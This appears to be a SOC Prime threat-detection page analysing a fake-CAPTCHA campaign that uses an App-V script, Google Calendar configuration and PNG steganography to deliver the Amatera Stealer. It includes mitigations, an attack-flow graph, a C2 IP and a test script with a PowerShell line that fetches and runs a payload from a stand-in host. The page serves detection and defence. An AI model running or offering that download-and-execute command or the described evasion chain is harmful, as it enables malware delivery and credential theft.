SOC Prime Bias: Medium

02 Feb 2026 14:10
newspaper icon Blackpoint

Novel Fake CAPTCHA Chain Delivers AMATERA Stealer

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Novel Fake CAPTCHA Chain Delivers AMATERA Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The report describes a multi-stage campaign that starts with a fake CAPTCHA lure and abuses a signed Microsoft App-V script as a LOLBin to proxy PowerShell. It pulls configuration from a public Google Calendar, extracts an encrypted payload hidden in PNG images via LSB steganography, and delivers the Amatera Stealer. Most steps run in memory to limit file artifacts. The final stage reaches a hard-coded C2 over TLS with Host-header spoofing.

Investigation

Researchers observed wscript.exe running SyncAppvPublishingServer.vbs to start PowerShell, then using dynamic alias and cmdlet resolution to conceal commands. A custom HTTPS client built on TcpClient and SslStream fetched a Google Calendar .ics file carrying base64 configuration. The loader generated a victim-specific subdomain, downloaded PNGs from CDN hosts, extracted embedded data via LSB steganography, decrypted it with a XOR key, and launched shellcode to load Amatera Stealer. The stealer establishes encrypted C2 using low-level Windows syscalls for stealth.

Mitigation

Block SyncAppvPublishingServer.vbs execution and remove App-V where it is not needed. Also monitor for calendar .ics fetches from unexpected processes. Restrict the Windows Run dialog via Group Policy and brief users on fake CAPTCHA prompts. Enable PowerShell logging, watch for alias-heavy or wildcard patterns, and flag wscript.exe→PowerShell ancestry. Detect outbound sessions where the Host header does not match the destination IP.

Response

If a suspicious Run command appears, alert on wscript.exe launching SyncAppvPublishingServer.vbs and correlate with PowerShell that uses indirect alias resolution or custom TLS routines. If PNG downloads from CDN domains are followed by in-memory decoding, contain and isolate the endpoint. Capture memory to identify Amatera shellcode and block the hard-coded C2 IP address 212.34.138.4.

"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc %% Nodes attack_user_execution["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Adversary tricks victim into copying and pasting a malicious command via the Run dialog.<br/>User executes fake CAPTCHA command."] class attack_user_execution action action_vbscript_proxy["<b>Action</b> – <b>T1216.002 System Script Proxy Execution</b><br/>Signed VBScript (SyncAppvPublishingServer.vbs) is run through wscript.exe to proxy malicious behavior."] class action_vbscript_proxy action action_powershell_loader["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>PowerShell loader is invoked indirectly to prepare the next stages."] class action_powershell_loader action action_network_proxy["<b>Action</b> – <b>T1571 Non-Standard Port</b>, <b>T1090.004 Proxy: Domain Fronting</b>, <b>T1572 Protocol Tunneling</b><br/>Dynamic alias/wildcard reconstruction and custom HTTPS over .NET sockets hide traffic on unusual ports."] class action_network_proxy action action_config_fetch["<b>Action</b> – <b>T1202 Indirect Command Execution</b>, <b>T1674 Input Injection</b><br/>Configuration is fetched from a public Google Calendar (.ics) file, using the calendar service as an indirect command channel."] class action_config_fetch action action_clipboard_gate["<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Clipboard token verification is used as a gating condition before loading further code in memory."] class action_clipboard_gate action action_in_memory_assembly["<b>Action</b> – <b>T1027.003 Steganography</b><br/>Base64 fragments are assembled in memory into a PowerShell ScriptBlock, hiding the payload within seemingly benign data."] class action_in_memory_assembly action action_png_stego["<b>Action</b> – <b>T1027.008 Stripped Payloads</b>, <b>T1027.002 Software Packing</b>, <b>T1027.004 Compile After Delivery</b>, <b>T1027.017 SVG Smuggling</b><br/>A PNG image from a CDN is retrieved; LSB data is extracted and XORu2011decrypted to reveal a hidden payload."] class action_png_stego action action_decompressed_payload["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/>Decompressed PowerShell payload is executed in memory via cmd.exe (Win32_Process.Create)."] class action_decompressed_payload action action_shellcode_loader["<b>Action</b> – <b>T1048.002 Exfiltration Over Asymmetric Encrypted Nonu2011C2 Protocol</b><br/>Native shellcode loader allocates memory with NtAllocateVirtualMemory and prepares encrypted exfiltration channel."] class action_shellcode_loader action malware_amatera_stealer["<b>Malware</b> – <b>T1555.003 Credentials from Web Browsers</b>, <b>T1217 Browser Information Discovery</b><br/>Amatera Stealer payload is loaded, contacts C2 at IP 212.34.138.4 with a spoofed Host header, and harvests browser data and saved passwords."] class malware_amatera_stealer malware %% Connections attack_user_execution –>|leads to| action_vbscript_proxy action_vbscript_proxy –>|triggers| action_powershell_loader action_powershell_loader –>|uses| action_network_proxy action_network_proxy –>|retrieves| action_config_fetch action_config_fetch –>|gates| action_clipboard_gate action_clipboard_gate –>|enables| action_in_memory_assembly action_in_memory_assembly –>|creates| action_png_stego action_png_stego –>|executes| action_decompressed_payload action_decompressed_payload –>|loads| action_shellcode_loader action_shellcode_loader –>|delivers| malware_amatera_stealer "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary obtains a foothold on a Windows endpoint and wishes to download and execute a malicious payload while evading simple command‑line detection. They craft a one‑liner that heavily relies on PowerShell aliases (iwr for Invoke‑WebRequest, iex for Invoke‑Expression) and wildcard patterns to mask the true intent. The command dynamically builds a script block via ScriptBlock.Create, then executes it with Invoke‑Expression. Because the rule looks for the presence of the keywords alias‑heavy, Invoke‑Expression, Invoke‑RestMethod, and ScriptBlock.Create in the process command line, this technique is expected to trigger the detection.

  • Regression Test Script:

    # -------------------------------------------------
# Alias‑Heavy, Wildcard‑Based PowerShell Attack Demo
# -------------------------------------------------
# Step 1: Assemble a malicious script block using wildcards and aliases
$payload = @"
$url = 'https://malicious.example.com/payload.ps1'
iwr $url -UseBasicParsing | iex
"@

# Step 2: Create the script block via ScriptBlock.Create (flagged keyword)
$sb = [ScriptBlock]::Create($payload)

# Step 3: Execute the script block using Invoke‑Expression (flagged keyword)
Invoke-Expression $sb

  • Cleanup Commands:

    # Remove the downloaded payload if it was saved locally
Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue

# Stop any lingering PowerShell processes that were started by the test
Get-Process -Name powershell | Where-Object {
    $_.StartTime -gt (Get-Date).AddMinutes(-5)
} | Stop-Process -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free